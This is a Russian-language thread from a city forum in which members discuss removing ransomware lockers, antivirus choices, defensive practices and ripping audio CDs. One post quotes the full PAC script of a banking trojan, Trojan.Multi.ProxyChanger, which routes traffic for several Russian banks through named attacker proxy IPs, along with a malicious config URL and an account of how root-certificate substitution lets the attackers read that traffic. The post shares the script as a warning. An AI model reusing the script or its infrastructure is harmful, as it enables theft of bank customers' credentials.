Перейти к содержанию
  • Реклама

  • Социальные сети



    Новости сайта Лыткарино Online
    на главной странице Яндекса
    добавить на Яндекс
XBOCT

Компьютерные вирусы и антивирусы

Рекомендуемые сообщения

Rio   

попалась тут система с зараженным userinit.exe

правишь HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell

с какого-то файла из documents and settings на значение explorer.exe

перезагружаешься, снова появляется страшная надпись, что сейчас все будет удалено, и все данные, и вся система, и весь биос, и даже небо... и вам ничего не поможет. :)

прогнал LiveCD cureit, нашел зараженные файлы в профиле, зараженный userinit.exe в system32 и в dllcache

удалил их

в венду зайти под пользователем конечно не удается.

скопировал userinit.exe с произвольного компа, все заработало.

ЗЫ говорят дочка решила установить прикольный скринсейвер из вконтактега, вот и получили прикольный скринсейвер скачать бесплатно без смс

:)

Про лайв сд: доктор веба работает что-то долго последнее время, порядка 8 часов. Быстрой проверкой не находит. А касперский вообще ничего не находит.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Naves   

Про лайв сд: доктор веба работает что-то долго последнее время, порядка 8 часов. Быстрой проверкой не находит. А касперский вообще ничего не находит

в последнее время лайв-сиди вообще почти всегда в ребут уходит.

остается только вытаскивание харда и подключение к другой системе.

еще был случай, касперский со свежими базами не ругался на зараженную систему, пока принудительно не включил какой-то режим. Система была заражена ZeuS

Так чем обезопаситься от этих блокираторов?

не сидеть под администратором на компьютере, для начала.

Использовать обновленный браузер Firefox, Chrome.

Выключать плагины Oracle (Sun) Java, регулярно обновлять Adobe Flash Plugin, или тоже выключить :)

Обновлять ОС по возможности.

Firewall по возможности (но толку от него мало при неправильных настройках)

Не запускать всякую хрень СмотриКакойПрикольныйКартинка.жопеге.exe

бесплатный антивирус от яндекса и касперского, до конца света его хватит ссылка

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Так чем обезопаситься от этих блокираторов?

Не ходить в Интернет. Защита почти 100% ;)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
riglik   

скачала лечилку доктора веба, мне тут серчено посоветовали, оч хорошая штука оказалась - сразу нашла винлока, якобы уже вылеченного и удаленного

пока скачаю демо-версию того же веба, потом посмотрю

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

скачала лечилку доктора веба, мне тут серчено посоветовали, оч хорошая штука оказалась - сразу нашла винлока, якобы уже вылеченного и удаленного

пока скачаю демо-версию того же веба, потом посмотрю

Кьюр АйТи вообще должна быть в "аптечке" )))

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Nimibu   

Вылечит тот, кто знает, что лечить. Лечится на сегодняшний день все, кроме некоторых видов шифровальщиков. Юзеру приходится раскошеливаться, если на жд какаято супер важная инфо.

Лайф сиди нужен реально только в случаях с файловым вирем.. Активным. С винлоками и смсками давно справляется антисмс

ссылка

ссылка

Только банить не надо за ссылку - она весьма полезна юзерам Лыткарино в том числе, это не реклама, просто указываю путь к квалифицированной помощи.

Изменено пользователем Nimibu

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Имею вопрос к спецам по прогам и вирусам. У меня раньше любой купленный диск mp3 с музыкой легко переписывался на комп и затем я перекидывал нужные вещи на плеер, чтобы слушать в дороге. С некоторых пор перестало переезжать с диска на комп, причем значок песни с диска на комп перетаскивается, но уже с компа эта песня не проигрывается (проигрыватель Winamp).

Может, это происки правообладателей, чтобы не копировали бесплатно? Типа разослали повсюду по Интернету соответствующую программу. Или это вирусология, Ваше мнение?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Не думаю, что вирье или происки копирайтеров. Раз копируется, то чего ж еще? Не wma с DRM'ом же. Файл весит столько, сколько и на диске? Можно пример "нерабочего" файла, если это не приратство :) ?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Naves   

мне кажется ты раньше и сейчас копируешь разные диски.

раньше ты копировал именно mp3 файлы, а сейчас ты вставил обычный audio-cd и пытаешься скопировать аудиодорожки. напрямую так просто это сделать нельзя.

Какая продолжительность музыки на твоем диске? Если меньше 100 миут, то это звуковой диск.

Чтобы перекодировать с компакт-диска в mp3 используются специальные программы, возможно раньше такая программа у тебя и стояла, и процесс копирования был прозрачным.

Еще кстати возможен вариант, в венде вроде была какая-то встроенная утилита для копирования дисков, но на некоторых дисках может стоять цифровая метка "защищено авторскими правами", и вендовая прога откажется копировать диск, тогда нужно воспользоваться другой программой.

Таких программ тысячи их, конкретно посоветовать не могу.

В комплекте с Nero Burning Rom должна идти

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
мне кажется ты раньше и сейчас копируешь разные диски. раньше ты копировал именно mp3 файлы, а сейчас ты вставил обычный audio-cd и пытаешься скопировать аудиодорожки. напрямую так просто это сделать нельзя.

Точно. Этого я не знал. Спасибо. Наверное, действительно раньше стояла такая программа. Закачал себе FreeRIP, все стало ОК. :ok:

Изменено пользователем Ибн-Саид

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Как вариант - да. Самое безопасное место. Ты хоть один вирус знаешь, который атакует корзину? :D

Действительно, я как-то и не подумала о корзине. Ведь на самом деле вирусы ее не атакуют. А то в последнее время часто они мой комп посещают, много важных документов потеряла. Уж не знаю как бороться. Спасибо за идею.

Изменено пользователем Марина123

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Антивирусник нормальный установите и не нужно будет документы в корзине хранить. Я уже несколько лет пользуюсь антивирусом Аваст Фри ссылка и ни разу не было проблем. Удобная бесплатная программа, скачала скачиваешь на месяц антивирусник, а потом регистрируешься и на год, и все бесплатно. Аваст защищает комп даже от тех вирусов, которых нет в базе данных.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Naves   

тут столкнулся с занятным вирусом на компе пользователя

Trojan.Multi.ProxyChanger.aa


function FindProxyForURL(url,host){

var P = "PROXY 146.185.213.110:8089"; P2 = "PROXY 62.76.179.132:8089";

if ((shExpMatch(host,"?nl?ne.r?b?ru")||

shExpMatch(host,"*cs?ank.r?")||

shExpMatch(host,"*inkoff.ru")||

shExpMatch(host,"www.av?ngard?ru"))||((

shExpMatch(host,"ava?g?rd?ru")||

shExpMatch(host,"retai?.?ayme?t.ru"))&&(shExpMatch(url,"https://*"))))

{return P;}

if (shExpMatch(host,"?n?ine.sbe?b?nk.r*"))

{return P2;}

return "DIRECT";}

если кратко, то данные настройки вбиваются в браузер, в результате, когда пользователь заходит на сайты банков, то данные идут через промежуточный сервер, со всеми вытекающими последствиями, осуществляется попытка кражи паролей на доступ к клиент-банкам. А как же шифрование, скажут некоторые. А никак, подмена корневых сертификатов в системе и трафик практически любого сайта будет аккуратно расшифровываться и снова зашифровываться. А как же подтверждение по смс, скажут другие. А кто может с уверенностью сказать, что их телефон чистый? Тут на днях приносили смартфон, в котором удивительным образом была установлена программа, которую нельзя удалить. Программа имела все права на все, интернет, телефонная книга, отправки и прием смс. В процессе допроса, выяснилось что ребенок что-то поставил для игры майнкрафт, а для этого он разрешил установку программ из непроверенных источников. Возвращаясь к вирусу. На компьютере стоял один из главных антивирусов нашей страны, он даже регулярно обновляется. Вот только проблема, он не может поймать все стотыщь-пицот скриптов, которые разбросаны на всех говно-сайтах страны (Если кушать соду каждый день...) И заблокировать все ссылки на этот страшный выше приведенный скрипт, хотя вот эта ссылка уже в базах
http://configspacs.com/k3ftGe/Guq9.uru

К чему я это все, и как страшно жить...

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Naves, и как же вы выловили вирус?Ручками или антивирусником другого известного производителя?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
vadim-s   

Есть такая банковская группа "Сосьете Женераль" - они рекомендуют такой антивирус. Типа многие банки его используют

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Naves   

Пузочес,

Да пока никак не выловил, надо смотреть автозагрузку

судя по информации в интернете, он прописывает хитрые настройки в браузерах, в результате которой браузер сначала выкачивает одну фигню, которая потом выкачивает другую, в результате которой прописываются прокси. А на диске все чисто.

Сам антивирус реагирует только на некую область в памяти без указания какая программа заражена.

В интернете есть статьи в которых описывалось как один вирус удалял другой, тк сейчас банковские вирусы борятся за незаметность, а ботнеты борятся за ресурсы процессоров

vadim-s, информационная безопасность это же процесс, одним антивирусом не обойдешься

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

А как же шифрование, скажут некоторые.

А никак, подмена корневых сертификатов в системе и трафик практически любого сайта будет аккуратно расшифровываться и снова зашифровываться.

Это он в хранилище добавит что ли О_о? Или все-таки появятся странные ругательства на самоподписанные сертификаты? :)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Naves   

Да, доверенные корневые центры сертификации. После этого можно подписать любую цепочку сертификатов для любого сайта

ссылка

Причем гуглохром не дает подменять сертификаты для своих доменов

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Rio   

Есть такая банковская группа "Сосьете Женераль" - они рекомендуют такой антивирус. Типа многие банки его используют

Банки и прочие структуры серьезные едва ли обходятся одним антивирусом. Помимо мер информационной безопасности, есть еще всякие детекторы угроз, отдельная железка ставится, которая анализирует траффик, и по имеющимся базам поведенчески и по адресам обращений детектит что в сети не все ладно.

4dffb9f50c23a58bce83ebbac8f8417b.png

И, говорят, куда бы не ставили эту штуку - везде она показывает свою исключительную полезность.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
vadim-s   

Вы мне рассказываете про информационную безопасность банков, а я об антивирусе, который они рекомендуют клиентам. Не хотите не ставьте - всего делов-то.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Банки и прочие структуры серьезные едва ли обходятся одним антивирусом. Помимо мер информационной безопасности, есть еще всякие детекторы угроз, отдельная железка ставится, которая анализирует траффик, и по имеющимся базам поведенчески и по адресам обращений детектит что в сети не все ладно.

4dffb9f50c23a58bce83ebbac8f8417b.png

И, говорят, куда бы не ставили эту штуку - везде она показывает свою исключительную полезность.

IDS уже не модно - IPS куда актуальнее. И чаще в виде модуля, нежели отдельной железки. Кстати, "антивирусные" модули тоже существуют. Но, что и так ясно, это решения сугубо энтерпрайзные и домашнему пользователю не нужны :)

Что же касается антивирусов, то мне видится, что ничего, кроме проверки по базе сигнатур как не было, так и нет. А значит никакой антивирус свежего зверька скорее всего не обнаружит. Поправьте меня, если это не так и уже появились чудо-эвристические анализаторы :)

Вы мне рассказываете про информационную безопасность банков, а я об антивирусе, который они рекомендуют клиентам. Не хотите не ставьте - всего делов-то.

Ну в корпоративном сегменте и нортоновский symantec очень любят. А стоит ли это..гм.. поделие использовать?

Изменено пользователем Dr.Bormental

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
vadim-s   

Ну в корпоративном сегменте и нортоновский symantec очень любят. А стоит ли это..гм.. поделие использовать?

Не знаю ...они предложили как альтернативу другим. А что? Думаете совсем никчёмный и стоит сносить?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Ну почему же? Просто кто бы ни рекомендовал антивирус, полагаться на него можно лишь ограниченно. Я вот использую использую такой подход: основной антивирус + cureit + avz (при необходимости).

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Naves   

ну я думаю, если включить антивирь на максимальную параною, он бы и нашел бы подозрительную активность.

Но те компы, в которых система "летала" несколько лет назад, после установки антивиря теперь тормозят так, что становится грустно.

Гигабайт оперативы занят антивирем, дисковая активность съедается им же, хочется взять его и выключить.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Для публикации сообщений создайте учётную запись или авторизуйтесь

Вы должны быть пользователем, чтобы оставить комментарий

Создать учетную запись

Зарегистрируйте новую учётную запись в нашем сообществе. Это очень просто!

Регистрация нового пользователя

Войти

Уже есть аккаунт? Войти в систему.

Войти


×
Яндекс.Метрика
Лыткарино Online - городской информационно-развлекательный портал, 18+
Контакты | Реклама на сайте
При любом копировании материалов сайта гиперссылка на источник обязательна.